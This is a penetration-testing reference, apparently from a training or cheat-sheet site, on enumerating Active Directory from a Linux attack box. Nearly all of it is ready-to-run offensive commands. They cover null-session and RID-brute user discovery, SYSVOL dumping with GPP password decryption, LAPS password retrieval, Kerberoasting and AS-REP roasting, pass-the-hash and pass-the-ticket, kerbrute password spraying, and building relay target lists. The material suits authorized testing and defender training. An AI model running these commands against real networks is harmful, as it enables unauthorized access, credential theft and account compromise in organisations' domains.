Remote AD Enumeration

Enumerate Active Directory from a Linux attack box with no shell on a domain host. Covers NetExec, Impacket, enum4linux-ng, rpcclient, SMB/RPC queries, and null session checks.

Sections Remote AD Enumeration

You have network access to the target environment from your Linux attack box. No shell on a domain-joined host yet. Start by identifying domain controllers, checking for null sessions, and pulling as much information as possible over SMB, RPC, and LDAP before you have credentials. Once you get a valid account, open up the full enumeration.

Identifying Domain Controllers

Before anything else, find the DCs. They run a predictable set of services.

terminal
# Nmap scan for common DC ports
root@localhost:~# nmap -p 53,88,135,139,389,445,464,636,3268,3269 -sV 10.10.11.0/24

# DNS SRV record lookup (if you know the domain name)
root@localhost:~# dig SRV _ldap._tcp.dc._msdcs.corp.local @10.10.11.35 dig SRV _kerberos._tcp.corp.local @10.10.11.35

# Nmap script to grab domain info from SMB
root@localhost:~# nmap -p 445 --script smb-os-discovery 10.10.11.35
Port 88 (Kerberos) is the strongest indicator of a DC. Port 3268 (Global Catalog) confirms it. If both are open, you are looking at a domain controller.

Null Session and Anonymous Enumeration

Some DCs still allow unauthenticated access over SMB, RPC, or LDAP. Always check before assuming you need credentials.

NetExec (Null/Guest Checks)

terminal
# Check null session on SMB
root@localhost:~# netexec smb 10.10.11.35 -u '' -p ''

# Check guest session
root@localhost:~# netexec smb 10.10.11.35 -u 'guest' -p ''

# Attempt user enumeration via null session
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --users 
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --shares 
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --groups

# RID brute force through null session (finds users even when --users fails)
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --rid-brute 10000

enum4linux-ng

A modern rewrite of enum4linux. Runs all SMB/RPC enumeration checks in one shot.

terminal
# Full enumeration with null session
root@localhost:~# enum4linux-ng -A 10.10.11.35

# With credentials
root@localhost:~# enum4linux-ng -A 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'

# Output to JSON for parsing
root@localhost:~# enum4linux-ng -A -oJ enum_output 10.10.11.35

rpcclient (Null Session)

terminal
# Connect with null session
root@localhost:~# rpcclient -U '' -N 10.10.11.35

# Inside rpcclient - common commands
rpcclient $> enumdomusers 
rpcclient $> enumdomgroups 
rpcclient $> querygroupmem 0x200 
rpcclient $> queryuser 0x1f4 
rpcclient $> getdompwinfo 
rpcclient $> enumprinters 
rpcclient $> netshareenumall
querygroupmem 0x200 queries the Domain Admins group (RID 512 = 0x200). queryuser 0x1f4 queries the built-in Administrator (RID 500 = 0x1f4). Use enumdomusers first to get RIDs, then query individual users.

SMB Enumeration

Share Enumeration

terminal
# List shares (authenticated)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --shares

# Spider shares for interesting files
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M spider_plus

# smbclient - list shares
root@localhost:~# smbclient -L //10.10.11.35 -U 'svc_backup%P@ssw0rd123'

# smbclient - connect to a share
root@localhost:~# smbclient //10.10.11.35/SYSVOL -U 'svc_backup%P@ssw0rd123'

# smbmap - check permissions on all shares
root@localhost:~# smbmap -H 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'

# smbmap - recursive listing of a share
root@localhost:~# smbmap -H 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -r SYSVOL --depth 5

SYSVOL and GPP Passwords

SYSVOL is readable by all domain users. It contains Group Policy files that sometimes hold credentials.

terminal
# Search SYSVOL for Group Policy Preference (GPP) passwords
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M gpp_password

# Manual SYSVOL search for cpassword in XML files
root@localhost:~# smbclient //10.10.11.35/SYSVOL -U 'svc_backup%P@ssw0rd123' -c 'recurse on; prompt off; mget *' grep -ri "cpassword" corp.local/

# Decrypt GPP password (if found)
root@localhost:~# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPP passwords were patched by MS14-025, but legacy XML files with cpassword attributes may still exist in SYSVOL. The AES key to decrypt them is publicly known. Always check.

RPC Enumeration (Authenticated)

rpcclient with Credentials

terminal
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35

# User enumeration
rpcclient $> enumdomusers rpcclient $> queryuser svc_backup rpcclient $> queryusergroups 0x451

# Group enumeration
rpcclient $> enumdomgroups rpcclient $> querygroupmem 0x200 rpcclient $> querygroup 0x200

# Domain info
rpcclient $> querydominfo rpcclient $> getdompwinfo

# SID lookups
rpcclient $> lookupnames "Domain Admins" rpcclient $> lookupsids S-1-5-21-3842939050-3880317879-2865463114-512

# Enumerate trusts
rpcclient $> dsr_enumtrustdom rpcclient $> enumtrust

Impacket RPC Tools

terminal
# lookupsid - RID cycling to enumerate users (works through null sessions too)
root@localhost:~# impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

# Null session RID cycling
root@localhost:~# impacket-lookupsid anonymous@10.10.11.35 -no-pass -domain-sids

# samrdump - dump SAM info over RPC
root@localhost:~# impacket-samrdump corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

# reg.py - remote registry queries
root@localhost:~# impacket-reg corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 query -keyName HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -v EnableLUA

NetExec Full Enumeration

NetExec is the Swiss Army knife for remote AD enumeration. These are the modules and flags you will use most.

User and Group Enumeration

terminal
# Dump all users
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --users

# Dump all groups
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --groups

# RID brute force (catches accounts that --users misses)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --rid-brute 10000

# Logged-on users
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --loggedon-users

# Check local admin access across a subnet
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123'

# Find hosts where current user is local admin
root@localhost:~# root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' | grep "(Pwn3d!)"

Password Policy

terminal
# Domain password policy (over SMB/RPC)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol

# Password policy over LDAP (same data, different protocol)
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol

Useful Modules

terminal
# Enumerate LAPS passwords
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M laps

# Check for WebDAV on hosts (useful for coercion attacks)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdav

# Enumerate antivirus products
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M enum_av

# Check for signing (important for relay attacks)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' --gen-relay-list relay_targets.txt

# Enumerate DNS records
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M adcs 
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M get-desc-users

Impacket Enumeration Tools

Domain User and Share Enumeration

terminal
# GetADUsers - dump domain users over LDAP
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# GetUserSPNs - find Kerberoastable accounts
root@localhost:~# impacket-GetUserSPNs corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# GetNPUsers - find AS-REP roastable accounts
root@localhost:~# impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.10.11.35 -no-pass -format hashcat

# smbclient.py - interactive SMB shell
root@localhost:~# impacket-smbclient corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

Authentication Methods

All Impacket tools support multiple authentication methods. Use the one that matches what you have.

terminal
# Password authentication
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# NTLM hash (pass-the-hash)
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -dc-ip 10.10.11.35

# Kerberos ticket (pass-the-ticket)
root@localhost:~# export KRB5CCNAME=/tmp/svc_backup.ccache impacket-GetADUsers -all corp.local/svc_backup -dc-ip 10.10.11.35 -k -no-pass

# AES key
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup -aesKey 4a3f2b1c... -dc-ip 10.10.11.35 -k -no-pass

DNS Enumeration

AD-integrated DNS zones contain host records, CNAME aliases, and SRV records that map out the entire domain.

terminal
# Zone transfer attempt (rarely works but always try)
root@localhost:~# dig axfr corp.local @10.10.11.35

# Enumerate common SRV records
root@localhost:~# dig SRV _ldap._tcp.corp.local @10.10.11.35 
root@localhost:~# dig SRV _kerberos._tcp.corp.local @10.10.11.35 
root@localhost:~# dig SRV _gc._tcp.corp.local @10.10.11.35 
root@localhost:~# dig SRV _kpasswd._tcp.corp.local @10.10.11.35

# Reverse lookup sweep
root@localhost:~# for i in $(seq 1 254); do dig -x 10.10.11.$i @10.10.11.35 +short; done

# adidnsdump - pull all DNS records from LDAP (authenticated)
root@localhost:~# adidnsdump -u 'corp.local\svc_backup' -p 'P@ssw0rd123' 10.10.11.35 cat records.csv

# dnstool.py - query and manipulate AD-integrated DNS
root@localhost:~# python3 dnstool.py -u 'corp.local\svc_backup' -p 'P@ssw0rd123' -r '*' --zone corp.local 10.10.11.35 -a query
adidnsdump pulls DNS records directly from the LDAP directory, including records that are hidden from standard DNS queries. Wildcard records and tombstoned entries can reveal decommissioned hosts and internal services.

Kerberos User Enumeration (No Creds)

Kerberos pre-authentication responses differ for valid vs invalid usernames. You can enumerate valid users without any credentials.

terminal
# kerbrute - fast Kerberos user enumeration
root@localhost:~# kerbrute userenum --dc 10.10.11.35 -d corp.local users.txt

# kerbrute - password spray (single password against user list)
root@localhost:~# kerbrute passwordspray --dc 10.10.11.35 -d corp.local users.txt 'Winter2026!'

# Nmap Kerberos enumeration
root@localhost:~# nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='corp.local',userdb=users.txt 10.10.11.35
Kerberos user enumeration does not cause account lockouts (pre-authentication failures are not counted). This makes it safe for large user lists. However, it does generate event ID 4768 on the DC.

Quick Recon Workflow

1

Port Scan and DC Identification" description: "Nmap the subnet for ports 88, 389, 445, 636, 3268. Identify DCs and note the domain name from SMB OS discovery or LDAP RootDSE.

2

Null Session Checks" description: "Try anonymous access on SMB, RPC, and LDAP. Run enum4linux-ng with no creds, try RID brute forcing through null sessions with NetExec and impacket-lookupsid.

3

Kerberos User Enumeration" description: "If you have a wordlist, run kerbrute to validate usernames. This works without any credentials.

4

Authenticated Enumeration" description: "Once you have a valid account: run NetExec with --users, --groups, --shares, --pass-pol. Dump SYSVOL for GPP passwords. Run spider_plus to find files on shares.

5

Full Data Collection" description: "Run BloodHound collection (bloodhound-python), dump DNS with adidnsdump, check for LAPS, ADCS, and signing. Build your target list for the next phase.